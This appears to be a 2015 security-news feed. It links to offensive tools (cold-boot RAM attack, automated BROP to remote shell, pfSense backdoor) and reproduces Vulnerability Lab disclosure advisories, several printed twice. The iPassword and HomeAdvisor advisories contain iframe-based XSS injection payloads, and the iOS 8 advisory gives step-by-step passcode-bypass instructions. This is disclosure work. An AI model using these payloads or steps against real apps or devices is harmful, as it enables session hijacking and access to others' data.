A microkernel designed to exploit the RAM coldboot vulnerability here.......https://github.com/NateBrune/icy-kernel
↧
icy-kernel
↧
BRAILLE
Braille is A fully automated tool that conducts a BROP attack (from crash to remote shell) when supplied with an input string that crashes a server due to a stack overflow.
more here......http://seclist.us/braille-a-fully-automated-tool-that-conducts-a-blind-return-oriented-programmingbrop-attack.html
more here......http://seclist.us/braille-a-fully-automated-tool-that-conducts-a-blind-return-oriented-programmingbrop-attack.html
↧
↧
PFSENSE_XMLRPC_BACKDOOR
pfsense_xmlrpc_backdoor is a sample payload and example use of abusing pfSense’s xmlrpc.php functions to establish a backdoor and get root level access to pfSense firewalls.
more here.......http://seclist.us/pfsense_xmlrpc_backdoor-a-php-backdoor-on-a-pfsense-firewall-over-xmlrpc-php.html
more here.......http://seclist.us/pfsense_xmlrpc_backdoor-a-php-backdoor-on-a-pfsense-firewall-over-xmlrpc-php.html
↧
An NFC PGP SmartCard For Android
Somebody asked me today for a response to the following comment which they had read:
"Never store your private PGP key on your mobile phone. In other words, do not encrypt/decrypt work emails on your smartphone. Rationale: Mobile phones are inherently insecure because the baseband processor on your phone always has potential access to your data."
This was shortly after I'd mentioned that I use PGP on my phone. Well, it might surprise you to learn that on Android at least, you can use PGP without giving the phone access to your keys.
more here.......https://grepular.com/An_NFC_PGP_SmartCard_For_Android
"Never store your private PGP key on your mobile phone. In other words, do not encrypt/decrypt work emails on your smartphone. Rationale: Mobile phones are inherently insecure because the baseband processor on your phone always has potential access to your data."
This was shortly after I'd mentioned that I use PGP on my phone. Well, it might surprise you to learn that on Android at least, you can use PGP without giving the phone access to your keys.
more here.......https://grepular.com/An_NFC_PGP_SmartCard_For_Android
↧
Incident Response Hunting Tools
Great, you’ve decided to move beyond reactive incident response and start hunting. While hunting is primarily a way of thinking about incident response it does rely on your technical capabilities, so what tools should you use? The focus for me is always on open source tools with tools with wide ranging applications. Here are my favorites...........http://sroberts.github.io/2015/04/21/hunting-tools/
↧
↧
iPassword Manager v2.6 iOS - Persistent Vulnerabilities
Document Title:
===============
iPassword Manager v2.6 iOS - Persistent Vulnerabilities
References (Source):
====================
http://www.vulnerability-lab.
Release Date:
=============
2015-04-21
Vulnerability Laboratory ID (VL-ID):
==============================
1455
Common Vulnerability Scoring System:
==============================
3.7
Product & Service Introduction:
==============================
iPassword can securely store your important information and can automatically log you into websites with a single tap.
There`s no need to remember the usernames, passwords, or even the website addresses. Join to iPassword today. Your digital
life will be in comfort and safe with it.
(Copy of the Vendor Homepage: https://itunes.apple.com/us/
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered multiple persistent input validation vulnerabilities in the official iPassword Free Manager v2.6 iOS web-application.
Vulnerability Disclosure Timeline:
==============================
2015-04-21: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Free Secure App Manager
Product: iPassword Free Manager - iOS Mobile Web Application 2.6
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Technical Details & Description:
==============================
Multiple application-side input validation web vulnerabilities has been discovered in the official iPassword v2.6 iOS web-application.
The vulnerability allows local and remote attackers to inject own script code to the application-side of the affected mobile web-application.
The security vulnerability is located in the `password` and `name` values of the send by email function. The service does not encode the input of the password
or the stored entries. Users are able to send the stored data by mail. The encoding of the send by mail function is broken and allows execution of
malicious script codes. The attackers saved a database entry with malicious code or exchanges an entry by mail. In the moment he converts the stored
string of the input, the filter mechanism encodes wring and executes the code. In the second instance the code executes on arrival of the send app mail.
The issue is located in the send password by email function and in the main send by mail function. The attack vector is located on the application-side
and the request method to inject is db sharing (send email) or by local interaction.
The security risk of the application-side web vulnerabilities are estimated as medium with a cvss (common vulnerability scoring system) count of 3.7.
Exploitation of the persistent web vulnerability requires a privileged ipassword application user account and low user interaction. Successful exploitation
of the persistent web vulnerability results in mobile application compromise or connected device component compromise.
Request Method(s):
[+] [Sync]
Vulnerable Module(s):
[+] iPassword - Password Input
[+] Wallet Entries Input (Name)
Vulnerable Parameter(s):
[+] password
[+] name
Affected Module(s):
[+] Local Mail Service App
[+] Remote Mail (Outgoing)
Proof of Concept (PoC):
=======================
The persistent input validation web vulnerability can be exploited by local and remote attackers with low or medium user interaction.
For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.
Manual steps to reproduce the vulnerability ...
1. Install the iPassword Manager app (https://itunes.apple.com/us/
2. Start the software
Note: Now the software asks a first time for a password
3. Inject your payload twice to the password input and press ok
Note: Now the software asks to send your password by mail
4. Click ok to send the data by mail
5. Now the first script code execution occurs in the mail body context
6. We continue and surf back in the app to add a new contact
7. Include to the contact name own script code and save the input
8. Click the send by mail button.
9. Review the arrived mail in the inbox
10. The script code execution occurs in the main body context of the mail
11. Successful reproduce of both vulnerabilities!
PoC: Contact > Send Mail
<html>
<head>
<title>Send by Mail Function</title>
<link rel="important stylesheet" href="chrome://messagebody/
</head>
<body>
<table border=0 cellspacing=0 cellpadding=0 width="100%" class="header-part1"><tr><td><
<div class="moz-text-plain"><pre wrap>
"> <iframe src=http://www.evolution-sec.
Von meinem iPhone gesendet
</pre></div></body>
</html>
PoC: iPassword > Send Mail
<html>
<head>
<title>iPassword</title>
<link rel="important stylesheet" href="chrome://messagebody/
</head>
<body>
<table border=0 cellspacing=0 cellpadding=0 width="100%" class="header-part1"><tr><td><
<div class="moz-text-plain"><pre wrap>
Backup Value: >" "><iframe src=http://www.evolution-sec.
</pre></div></body>
</html>
Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure parse and encode of the vulnerable password and name input fields.
Restrict the input fields and disallow special chars. Encode the outgoing service value input to prevent persistent local/remote script code injection attacks.
Setup a own filter mechanism with exception-handling to block these type of attacks in outgoing service mails.
Security Risk:
==============
The security risk of the multiple persistent input validation web vulnerabilities are estimated as medium. (CVSS 3.7)
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses,
policies, deface websites, hack into databases or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/
Feeds: vulnerability-lab.com/rss/rss.
Programs: vulnerability-lab.com/submit.
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin@vulnerability-lab.com or research@vulnerability-lab.com
Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™
===============
iPassword Manager v2.6 iOS - Persistent Vulnerabilities
References (Source):
====================
http://www.vulnerability-lab.
Release Date:
=============
2015-04-21
Vulnerability Laboratory ID (VL-ID):
==============================
1455
Common Vulnerability Scoring System:
==============================
3.7
Product & Service Introduction:
==============================
iPassword can securely store your important information and can automatically log you into websites with a single tap.
There`s no need to remember the usernames, passwords, or even the website addresses. Join to iPassword today. Your digital
life will be in comfort and safe with it.
(Copy of the Vendor Homepage: https://itunes.apple.com/us/
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered multiple persistent input validation vulnerabilities in the official iPassword Free Manager v2.6 iOS web-application.
Vulnerability Disclosure Timeline:
==============================
2015-04-21: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Free Secure App Manager
Product: iPassword Free Manager - iOS Mobile Web Application 2.6
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Technical Details & Description:
==============================
Multiple application-side input validation web vulnerabilities has been discovered in the official iPassword v2.6 iOS web-application.
The vulnerability allows local and remote attackers to inject own script code to the application-side of the affected mobile web-application.
The security vulnerability is located in the `password` and `name` values of the send by email function. The service does not encode the input of the password
or the stored entries. Users are able to send the stored data by mail. The encoding of the send by mail function is broken and allows execution of
malicious script codes. The attackers saved a database entry with malicious code or exchanges an entry by mail. In the moment he converts the stored
string of the input, the filter mechanism encodes wring and executes the code. In the second instance the code executes on arrival of the send app mail.
The issue is located in the send password by email function and in the main send by mail function. The attack vector is located on the application-side
and the request method to inject is db sharing (send email) or by local interaction.
The security risk of the application-side web vulnerabilities are estimated as medium with a cvss (common vulnerability scoring system) count of 3.7.
Exploitation of the persistent web vulnerability requires a privileged ipassword application user account and low user interaction. Successful exploitation
of the persistent web vulnerability results in mobile application compromise or connected device component compromise.
Request Method(s):
[+] [Sync]
Vulnerable Module(s):
[+] iPassword - Password Input
[+] Wallet Entries Input (Name)
Vulnerable Parameter(s):
[+] password
[+] name
Affected Module(s):
[+] Local Mail Service App
[+] Remote Mail (Outgoing)
Proof of Concept (PoC):
=======================
The persistent input validation web vulnerability can be exploited by local and remote attackers with low or medium user interaction.
For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.
Manual steps to reproduce the vulnerability ...
1. Install the iPassword Manager app (https://itunes.apple.com/us/
2. Start the software
Note: Now the software asks a first time for a password
3. Inject your payload twice to the password input and press ok
Note: Now the software asks to send your password by mail
4. Click ok to send the data by mail
5. Now the first script code execution occurs in the mail body context
6. We continue and surf back in the app to add a new contact
7. Include to the contact name own script code and save the input
8. Click the send by mail button.
9. Review the arrived mail in the inbox
10. The script code execution occurs in the main body context of the mail
11. Successful reproduce of both vulnerabilities!
PoC: Contact > Send Mail
<html>
<head>
<title>Send by Mail Function</title>
<link rel="important stylesheet" href="chrome://messagebody/
</head>
<body>
<table border=0 cellspacing=0 cellpadding=0 width="100%" class="header-part1"><tr><td><
<div class="moz-text-plain"><pre wrap>
"> <iframe src=http://www.evolution-sec.
Von meinem iPhone gesendet
</pre></div></body>
</html>
PoC: iPassword > Send Mail
<html>
<head>
<title>iPassword</title>
<link rel="important stylesheet" href="chrome://messagebody/
</head>
<body>
<table border=0 cellspacing=0 cellpadding=0 width="100%" class="header-part1"><tr><td><
<div class="moz-text-plain"><pre wrap>
Backup Value: >" "><iframe src=http://www.evolution-sec.
</pre></div></body>
</html>
Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure parse and encode of the vulnerable password and name input fields.
Restrict the input fields and disallow special chars. Encode the outgoing service value input to prevent persistent local/remote script code injection attacks.
Setup a own filter mechanism with exception-handling to block these type of attacks in outgoing service mails.
Security Risk:
==============
The security risk of the multiple persistent input validation web vulnerabilities are estimated as medium. (CVSS 3.7)
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses,
policies, deface websites, hack into databases or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/
Feeds: vulnerability-lab.com/rss/rss.
Programs: vulnerability-lab.com/submit.
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin@vulnerability-lab.com or research@vulnerability-lab.com
Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™
↧
Apple iOS 8.0 - 8.0.2 - Controls Re Auth Bypass Vulnerability
Document Title:
===============
Apple iOS 8.0 - 8.0.2 - Controls Re Auth Bypass Vulnerability
References (Source):
====================
http://www.vulnerability-lab.
Video: http://www.vulnerability-lab.
Release Date:
=============
2015-03-02
Vulnerability Laboratory ID (VL-ID):
==============================
1322
Common Vulnerability Scoring System:
==============================
5.2
Product & Service Introduction:
==============================
iOS (previously iPhone OS) is a mobile operating system developed and distributed by Apple Inc. Originally released in 2007 for
the iPhone and iPod Touch, it has been extended to support other Apple devices such as the iPad and Apple TV. Unlike Microsoft`s
Windows Phone (Windows CE) and Google`s Android, Apple does not license iOS for installation on non-Apple hardware. As of
September 12, 2012, Apple`s App Store contained more than 700,000 iOS applications, which have collectively been downloaded more
than 30 billion times. It had a 14.9% share of the smartphone mobile operating system units shipped in the third quarter of 2012,
behind only Google`s Android. In June 2012, it accounted for 65% of mobile web data consumption (including use on both the iPod
Touch and the iPad). At the half of 2012, there were 410 million devices activated. According to the special media event held by
Apple on September 12, 2012, 400 million devices have been sold through June 2012.
The user interface of iOS is based on the concept of direct manipulation, using multi-touch gestures. Interface control elements
consist of sliders, switches, and buttons. Interaction with the OS includes gestures such as swipe, tap, pinch, and reverse pinch,
all of which have specific definitions within the context of the iOS operating system and its multi-touch interface. Internal
accelerometers are used by some applications to respond to shaking the device (one common result is the undo command) or rotating
it in three dimensions (one common result is switching from portrait to landscape mode).
iOS is derived from OS X, with which it shares the Darwin foundation. iOS is Apple`s mobile version of the OS X operating system
used on Apple computers.
In iOS, there are four abstraction layers: the Core OS layer, the Core Services layer, the Media layer, and the Cocoa Touch layer.
The current version of the operating system (iOS 6.1) dedicates 1-1.5 GB of the device`s flash memory for the system partition,
using roughly 800 MB of that partition (varying by model) for iOS itself. iOS currently runs on iPhone, Apple TV, iPod Touch, and iPad.
( Copy of the Homepage: http://en.wikipedia.org/wiki/
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered bypass vulnerability in the official Apple (iPhone) iOS v8.0 (12A365) - v8.0.2 mobile device system.
Vulnerability Disclosure Timeline:
==============================
2014-09-18: Researcher Notification & Coordination (Benjamin Kunz Mejri - VL Core Research Team)
2014-09-28: Vendor Notification (Apple Security Team - Acknowledgement Program)
2015-03-02: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Apple
Product: iOS 8.0
Exploitation Technique:
=======================
Local
Severity Level:
===============
Medium
Technical Details & Description:
==============================
A local pass code (code lock) bypass and glitch has been discovered in the Apple iOS v8.0 (12A365) mobile device system.
The vulnerability allows to bypass or evade via glitch the regular pass code restriction of the embed iOS device system.
The local bypass vulnerability is located in the favorite contact preview function that can be used for imessages or phone calls.
Local attackers with physical access can glitch the display by usage of siri to bypass since the end of a call the device system
access restriction.
To exploit the attacker visit the favorite call function via the home button in the ios task favorite preview slideshow. He clicks
a contact and uses siri to merge via glitch with the authorized call app. In the next step he locks the mobile device. The he
hold the volume + button multiple times to keep the service since the call end ahead to the pass code logon screen. The issue
is very tricky to exploit but affects at the end obviously secure pass code restriction. The attacker is able to multiple times
push in the last moment the power button to deactivate the display and start the pass code lock. However the local attacker is
able to bypass exactly this mechanism in the mentioned location.
During the tests the security researcher revealed a video that demonstrates the security issue and the glitch that affects the
local device security. Like in the Samsung in 2010 the device allows to access the information as long as a call runs in
the phone app. The local issue has been tested to verify with the default configured iphone 6 and 5s device.
The security risk of the local pass code bypass vulnerability is estimated as medium with a cvss (common vulnerability scoring
system) count of 5.2. Exploitation of the local glitch bypass vulnerability requires a privileged web-application user account,
multi user account or restricted physical device access without user interaction. Successful exploitation of the local pass code
bypass vulnerability results in device compromise or information leaking.
Affected Device(s):
[+] Apple > iPhone 5 & 6
Affected OS Version(s):
[+] iOS v8.0 (12A365)
Tested Device(s):
[+] Apple iPhone 5s & 6 > iOS v8.0 (12A365)
Proof of Concept (PoC):
=======================
The auth bypass vulnerability can be exploited by local attackers with physical device access without user interaction.
For security demonstration or to reproduce the issue follow the provided information and steps below to continue.
Requirement(s):
[+] iOS v8.0 (default install)
[+] Apple Device (iPad 2, iPhone 5s or iPhone 6)
[+] Two healthy hands ;)
Manual Steps to reproduce the local vulnerability ...
1. Start your iOS device and install the new iOS v8.0 to your ipad2, iphone 5s or iphone 6 device
2. Start the mobile and login to the pass code
3. Now press the home button twice to see the app preview slide show and the new favorite contract slideshow above
4. move you finger over the favorite contact and two symboles become visible (Phone app and Message app)
5. Press now the home button two seconds to activate siri and push in the last second the private call button to the contact
Note: Be fast! After it the siri which is in default mode available glitches ahead to the phone call
6. Now you push the power button on top of the mobile and shortly after it you use the hardware volumen to reactivate
Note: The mobile now goes in the locked mode after the power button push but the siri is ahead glitched to the call that runs
7. In the call mask you can click the contacts button by pressing around the button because of the siri glitch
8. The contact list becomes available as long as the call runs with the glitch through siri
9. Successul bypass of the secure pass code restriction!
Reference(s):
../poc-video.wmv
Picture(s):
../1.png
../2.png
../3.png
../4.png
../5.png
../6.png
../7.png
../8.png
Security Risk:
==============
The security risk of the local auth bypass issue and glitch in the iOS v8.0 is estimated as medium. (CVS 5.2)
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses,
policies, deface websites, hack into databases or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/
Feeds: vulnerability-lab.com/rss/rss.
Programs: vulnerability-lab.com/submit.
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin@vulnerability-lab.com or research@vulnerability-lab.
Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™
===============
Apple iOS 8.0 - 8.0.2 - Controls Re Auth Bypass Vulnerability
References (Source):
====================
http://www.vulnerability-lab.
Video: http://www.vulnerability-lab.
Release Date:
=============
2015-03-02
Vulnerability Laboratory ID (VL-ID):
==============================
1322
Common Vulnerability Scoring System:
==============================
5.2
Product & Service Introduction:
==============================
iOS (previously iPhone OS) is a mobile operating system developed and distributed by Apple Inc. Originally released in 2007 for
the iPhone and iPod Touch, it has been extended to support other Apple devices such as the iPad and Apple TV. Unlike Microsoft`s
Windows Phone (Windows CE) and Google`s Android, Apple does not license iOS for installation on non-Apple hardware. As of
September 12, 2012, Apple`s App Store contained more than 700,000 iOS applications, which have collectively been downloaded more
than 30 billion times. It had a 14.9% share of the smartphone mobile operating system units shipped in the third quarter of 2012,
behind only Google`s Android. In June 2012, it accounted for 65% of mobile web data consumption (including use on both the iPod
Touch and the iPad). At the half of 2012, there were 410 million devices activated. According to the special media event held by
Apple on September 12, 2012, 400 million devices have been sold through June 2012.
The user interface of iOS is based on the concept of direct manipulation, using multi-touch gestures. Interface control elements
consist of sliders, switches, and buttons. Interaction with the OS includes gestures such as swipe, tap, pinch, and reverse pinch,
all of which have specific definitions within the context of the iOS operating system and its multi-touch interface. Internal
accelerometers are used by some applications to respond to shaking the device (one common result is the undo command) or rotating
it in three dimensions (one common result is switching from portrait to landscape mode).
iOS is derived from OS X, with which it shares the Darwin foundation. iOS is Apple`s mobile version of the OS X operating system
used on Apple computers.
In iOS, there are four abstraction layers: the Core OS layer, the Core Services layer, the Media layer, and the Cocoa Touch layer.
The current version of the operating system (iOS 6.1) dedicates 1-1.5 GB of the device`s flash memory for the system partition,
using roughly 800 MB of that partition (varying by model) for iOS itself. iOS currently runs on iPhone, Apple TV, iPod Touch, and iPad.
( Copy of the Homepage: http://en.wikipedia.org/wiki/
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered bypass vulnerability in the official Apple (iPhone) iOS v8.0 (12A365) - v8.0.2 mobile device system.
Vulnerability Disclosure Timeline:
==============================
2014-09-18: Researcher Notification & Coordination (Benjamin Kunz Mejri - VL Core Research Team)
2014-09-28: Vendor Notification (Apple Security Team - Acknowledgement Program)
2015-03-02: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Apple
Product: iOS 8.0
Exploitation Technique:
=======================
Local
Severity Level:
===============
Medium
Technical Details & Description:
==============================
A local pass code (code lock) bypass and glitch has been discovered in the Apple iOS v8.0 (12A365) mobile device system.
The vulnerability allows to bypass or evade via glitch the regular pass code restriction of the embed iOS device system.
The local bypass vulnerability is located in the favorite contact preview function that can be used for imessages or phone calls.
Local attackers with physical access can glitch the display by usage of siri to bypass since the end of a call the device system
access restriction.
To exploit the attacker visit the favorite call function via the home button in the ios task favorite preview slideshow. He clicks
a contact and uses siri to merge via glitch with the authorized call app. In the next step he locks the mobile device. The he
hold the volume + button multiple times to keep the service since the call end ahead to the pass code logon screen. The issue
is very tricky to exploit but affects at the end obviously secure pass code restriction. The attacker is able to multiple times
push in the last moment the power button to deactivate the display and start the pass code lock. However the local attacker is
able to bypass exactly this mechanism in the mentioned location.
During the tests the security researcher revealed a video that demonstrates the security issue and the glitch that affects the
local device security. Like in the Samsung in 2010 the device allows to access the information as long as a call runs in
the phone app. The local issue has been tested to verify with the default configured iphone 6 and 5s device.
The security risk of the local pass code bypass vulnerability is estimated as medium with a cvss (common vulnerability scoring
system) count of 5.2. Exploitation of the local glitch bypass vulnerability requires a privileged web-application user account,
multi user account or restricted physical device access without user interaction. Successful exploitation of the local pass code
bypass vulnerability results in device compromise or information leaking.
Affected Device(s):
[+] Apple > iPhone 5 & 6
Affected OS Version(s):
[+] iOS v8.0 (12A365)
Tested Device(s):
[+] Apple iPhone 5s & 6 > iOS v8.0 (12A365)
Proof of Concept (PoC):
=======================
The auth bypass vulnerability can be exploited by local attackers with physical device access without user interaction.
For security demonstration or to reproduce the issue follow the provided information and steps below to continue.
Requirement(s):
[+] iOS v8.0 (default install)
[+] Apple Device (iPad 2, iPhone 5s or iPhone 6)
[+] Two healthy hands ;)
Manual Steps to reproduce the local vulnerability ...
1. Start your iOS device and install the new iOS v8.0 to your ipad2, iphone 5s or iphone 6 device
2. Start the mobile and login to the pass code
3. Now press the home button twice to see the app preview slide show and the new favorite contract slideshow above
4. move you finger over the favorite contact and two symboles become visible (Phone app and Message app)
5. Press now the home button two seconds to activate siri and push in the last second the private call button to the contact
Note: Be fast! After it the siri which is in default mode available glitches ahead to the phone call
6. Now you push the power button on top of the mobile and shortly after it you use the hardware volumen to reactivate
Note: The mobile now goes in the locked mode after the power button push but the siri is ahead glitched to the call that runs
7. In the call mask you can click the contacts button by pressing around the button because of the siri glitch
8. The contact list becomes available as long as the call runs with the glitch through siri
9. Successul bypass of the secure pass code restriction!
Reference(s):
../poc-video.wmv
Picture(s):
../1.png
../2.png
../3.png
../4.png
../5.png
../6.png
../7.png
../8.png
Security Risk:
==============
The security risk of the local auth bypass issue and glitch in the iOS v8.0 is estimated as medium. (CVS 5.2)
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses,
policies, deface websites, hack into databases or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/
Feeds: vulnerability-lab.com/rss/rss.
Programs: vulnerability-lab.com/submit.
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin@vulnerability-lab.com or research@vulnerability-lab.
Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™
↧
NetNanny uses a shared private key and root CA
NetNanny uses a shared private key and root Certificate Authority (CA), making systems broadly vulnerable to HTTPS spoofing.
more here......http://www.kb.cert.org/vuls/id/260780
more here......http://www.kb.cert.org/vuls/id/260780
↧
Android 0-day vulnerability - Drive by download
Security Issue:
===============
It is possible to fool Android users into performing
undesired actions on their devices.
Namely, it is possible to force them downloading
malicious applications without being aware of it.
It seems to affect all versions of Android.
Reference (source):
===================
http://www.nes.fr/securitylab/?p=1865
Proof Of Concept:
=================
https://www.youtube.com/watch?v=ekvdO8tdJ34
PS: I'm not sure I would call this a drive by download
↧
↧
HomeAdvisor Bug Bounty #1 - Filter Bypass & Client Side Exception Handling Vulnerability
Document Title:
===============
HomeAdvisor (Bug Bounty #1) - Filter Bypass & Client Side Exception Handling Vulnerability
References (Source):
====================
http://www.vulnerability-lab.
Release Date:
=============
2015-04-21
Vulnerability Laboratory ID (VL-ID):
==============================
1452
Common Vulnerability Scoring System:
==============================
3.6
Product & Service Introduction:
==============================
HomeAdvisor is a website that lists pre-screened and customer-rated service professionals. The website also has tools, products, and resources
for home improvement, maintenance, and repair. HomeAdvisor is a subsidiary of IAC. Professionals in the HomeAdvisor network are pre-screened for
criminal records, bankruptcy issues, bad reviews, sex offenses, and cases of malpractice. Homeowners choose a category that matches their home
improvement needs, enter their full address or adjacent cross-streets and contact information and answer three pages of questions about their project.
(Copy of the Homepage: http://en.wikipedia.org/wiki/
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Core Research Team discovered a filter bypass and issue and client-side cross site scripting web vulnerability in the official homeadvisor web-application.
Vulnerability Disclosure Timeline:
==============================
2015-03-10: Researcher Notification & Coordination (Benjamin Kunz Mejri - Evolution Security GmbH)
2015-03-11: Vendor Notification (HomeAdvisor Inc - Security Research Team)
2015-03-26: Vendor Response/Feedback (HomeAdvisor Inc - Security Research Team)
2015-04-20: Vendor Fix/Patch (HomeAdvisor Inc - Developer Team)
2015-04-21: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
HomeAdvisor Inc
Product: HomeAdvisor - Web Application (Online Service) 2015 Q2
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Technical Details & Description:
==============================
A non-persistent cross site scripting web vulnerability (client-side) and filter bypass issue has been discovered in the official HomeAdvisor web-application.
The security vulnerability allows remote attackers to execute client-side script code that compromises the homeadvisor web-application.
The client-side cross site scripting web vulnerability is located in the exception-handling comments context. Remote attackers are able to inject client-side
script code that executes in the web-application exception-handling. The request method to execute is GET and the attack vector is client-side. Remote attackers
are able to prepare special crafted urls with own script codes to compromise homeadvisor user session data in connection with client-side attacks.
The security risk of the client-side cross site scripting web vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.6.
Exploitation of the non-persistent web vulnerability requires a low privileged web-application user account and low or medium user interaction. Successful exploitation of
the vulnerabilities result in persistent phishing, session hijacking, persistent external redirect to malicious sources and application-side manipulation of affected or
connected module context.
Request Method(s):
[+] GET
Vulnerable Module(s):
[+] rated.VipElectric.11975047.
Affected Parameter(s):
[+] sm/security/login/
Proof of Concept (PoC):
=======================
The client-side cross site scripting vulnerability and filter bypass issue can be exploited by remote attackers without privileged application user account
and with low or medium user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
Manual steps to reproduce the vulnerability ...
1. Login to the service
2. Surf to for example (http://www.homeadvisor.com/
3. Inject splitted char payload to the input of the comments
4. Send the comment
5. An exception occurs with an error (An error has occurred, please try again later (400124)
6. Under the exception is the injected code
7. Now click to embed the stuff or use the share function
8. Successful reproduce of the vulnerability!
PoC: Payload(s)
</> %20%20%20"><iframe src=http://www.vulnerability-
--- PoC Session Logs [GET] (Execution) ---
1:10:13.175[555ms][total 555ms]
Status: 200[OK]
